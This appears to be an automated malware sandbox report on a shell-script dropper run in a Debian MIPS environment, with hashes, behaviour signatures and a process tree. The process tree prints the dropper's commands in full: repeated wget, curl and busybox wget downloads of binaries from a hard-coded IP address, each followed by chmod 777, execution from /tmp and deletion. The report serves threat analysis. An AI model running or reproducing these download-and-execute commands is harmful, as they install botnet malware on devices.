Analysis
-
max time kernel
89s -
max time network
92s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/11/2024, 03:07
Static task
static1
Behavioral task
behavioral1
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
-
Size
10KB
-
MD5
00e6a838ebbbb8d44e8bde3072d71948
-
SHA1
18ba68e4dc8af71f08dc42dc68055a295059cee5
-
SHA256
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be
-
SHA512
a8395ad7797c42c32a6f073151b82aea873fa6c842131b0899ee95e667e0038619feddfc236a5b12c834fb6a032f31a0cd79e3f931da05269dda866616ebdc14
-
SSDEEP
192:uTWqEbzElT+8s8V5fmlJRGmGxFNCiOn8s8V5alJRGm6xFNCi/WqEbzcq:unT+8s8V5fmlJRGmrn8s8V5alJRGmf
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 924 chmod 954 chmod 801 chmod 942 chmod 948 chmod 725 chmod 882 chmod 906 chmod 936 chmod 762 chmod 845 chmod 852 chmod 864 chmod 870 chmod 888 chmod 930 chmod 960 chmod 815 chmod 876 chmod 894 chmod 918 chmod 966 chmod 738 chmod 900 chmod 732 chmod 795 chmod 858 chmod 912 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN 727 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T 733 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK 739 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM 764 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk 796 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk /tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu 802 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu /tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL 816 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL /tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD 847 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD /tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV 853 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV /tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD 859 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD /tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP 865 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP /tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 871 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 /tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik 877 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik /tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt 883 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt /tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu 889 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu /tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL 895 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL /tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD 901 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD /tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV 907 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV /tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD 913 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD /tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP 919 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP /tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 925 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 /tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik 931 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik /tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt 937 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN 943 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T 949 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK 955 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM 961 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk 967 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 865 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP 919 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP 863 busybox 866 rm 915 wget 916 curl 917 busybox 920 rm 861 wget 862 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt curl File opened for modification /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T curl File opened for modification /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM curl File opened for modification /tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD curl File opened for modification /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK curl File opened for modification /tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP curl File opened for modification /tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL curl File opened for modification /tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV curl File opened for modification /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk curl File opened for modification /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T curl File opened for modification /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk curl File opened for modification /tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu curl File opened for modification /tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 curl File opened for modification /tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD curl File opened for modification /tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik curl File opened for modification /tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt curl File opened for modification /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN curl File opened for modification /tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD curl File opened for modification /tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV curl File opened for modification /tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik curl File opened for modification /tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD curl File opened for modification /tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu curl File opened for modification /tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP curl File opened for modification /tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 curl File opened for modification /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM curl File opened for modification /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN curl File opened for modification /tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL curl File opened for modification /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK curl
Processes
-
/tmp/e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh/tmp/e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh1⤵PID:695
-
/bin/rm/bin/rm bins.sh2⤵PID:699
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:705
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:724
-
-
/bin/chmodchmod 777 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN./nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:728
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:729
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:731
-
-
/bin/chmodchmod 777 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T./0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:734
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:735
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:737
-
-
/bin/chmodchmod 777 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK./PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:740
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:741
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:756
-
-
/bin/chmodchmod 777 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM./Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:767
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:769
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:791
-
-
/bin/chmodchmod 777 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk./tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:797
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:798
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:800
-
-
/bin/chmodchmod 777 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu./y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:803
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:804
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:806
-
-
/bin/chmodchmod 777 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL./hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:820
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:821
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:839
-
-
/bin/chmodchmod 777 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD./RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:848
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:849
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:851
-
-
/bin/chmodchmod 777 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV./OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:857
-
-
/bin/chmodchmod 777 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD./TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:860
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:861
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/chmodchmod 777 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP./YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:865
-
-
/bin/rmrm YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:866
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:867
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:869
-
-
/bin/chmodchmod 777 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1./JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:872
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:873
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:875
-
-
/bin/chmodchmod 777 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik./Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:878
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:879
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:881
-
-
/bin/chmodchmod 777 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt./BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:884
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:885
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:887
-
-
/bin/chmodchmod 777 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu./y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:890
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:891
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:893
-
-
/bin/chmodchmod 777 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL./hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:896
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:897
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:899
-
-
/bin/chmodchmod 777 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD./RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:902
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:903
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:905
-
-
/bin/chmodchmod 777 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV./OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:908
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:909
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:911
-
-
/bin/chmodchmod 777 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD./TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:914
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP./YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:919
-
-
